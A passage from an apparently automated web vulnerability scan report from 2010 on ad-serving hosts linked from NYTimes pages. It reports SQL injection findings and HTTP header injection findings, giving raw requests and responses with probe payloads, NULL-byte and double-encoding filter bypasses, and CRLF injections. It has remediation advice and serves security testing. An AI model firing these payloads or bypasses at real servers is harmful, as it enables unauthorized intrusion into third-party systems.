GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00''&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5739.NYTimes.com/B4990972.8
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 71268400%20or%201%3d1--%20 and 71268400%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d1--%20=1 HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');
function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Flash40.swf"; var gif = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Static.jpg"; var minV = 8; var FWH = ' width="728" height="90" '; var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) { var ctParam = ctp[ctIndex]; var ctVal = ctv[ctIndex]; if(ctVal != null && typeof(ctVal) == 'string') { if(ctVal == "") { ctVal = defaultCtVal; } else { ctVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B ...[SNIP]...
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d2--%20=1 HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130399999999999003BAN007"><img src="http://s0.2mdn.net/viewad/2215498/BAN_TorchBrowser_728x90_FY11_Q3_Static.jpg" border=0 alt="Click here to find out more!"></a>');
1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5739.NYTimes.com/B4990972.8
Issue detail
The opzn&page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the opzn&page parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel'&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel''&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5739.NYTimes.com/B4990972.8
Issue detail
The pos parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pos parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00'&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5579
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 03 16:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00''&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 434
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black ...[SNIP]...
1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]
Summary
Severity: High
Confidence: Tentative
Host: http://amch.questionmarket.com
Path: /adscgen/sta.php
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adscgen/sta.php%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:49:02 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1410
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... </a> about the error.
</dd> ...[SNIP]...
Request 2
GET /adscgen/sta.php%2527%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:49:26 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Length: 308 Keep-Alive: timeout=120, max=267 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adscgen/sta.php%27%27 was not found on this server.< ...[SNIP]...
2. HTTP header injection
There are 82 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://50.xg4ken.com
Path: /media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3ad15%0d%0a1c8f5fba2b9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&3ad15%0d%0a1c8f5fba2b9=1 HTTP/1.1 Host: 50.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 01:48:15 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=2fb24f52-9cc4-a448-bb6f-0000476b34c3; expires=Fri, 11-Feb-2011 01:48:15 GMT; path=/; domain=.xg4ken.com Location: http://www.perpetual.com.au/investors.aspx?3ad15 1c8f5fba2b9=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
2.2. http://50.xg4ken.com/media/redir.php [url[] parameter]
Summary
Severity: High
Confidence: Certain
Host: http://50.xg4ken.com
Path: /media/redir.php
Issue detail
The value of the url[] request parameter is copied into the Location response header. The payload add4a%0d%0ac9c4539c3b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspxadd4a%0d%0ac9c4539c3b6 HTTP/1.1 Host: 50.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 01:48:12 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=69a583c2-bc54-63e9-bbde-000069f3421b; expires=Fri, 11-Feb-2011 01:48:12 GMT; path=/; domain=.xg4ken.com Location: http://www.perpetual.com.au/investors.aspxadd4a c9c4539c3b6 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/BannerRedirect.asp
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fbfaf%0d%0a92218480552 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0fbfaf%0d%0a92218480552; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0fbfaf 92218480552; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Connection: close
2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bs.serving-sys.com
Path: /BurstingPipe/BannerSource.asp
Issue detail
The value of the Pos request parameter is copied into the Set-Cookie response header. The payload ff8ba%0d%0a362c533d84b was submitted in the Pos parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=1922996&Page=&PluID=0&Pos=ff8ba%0d%0a362c533d84b HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
Response
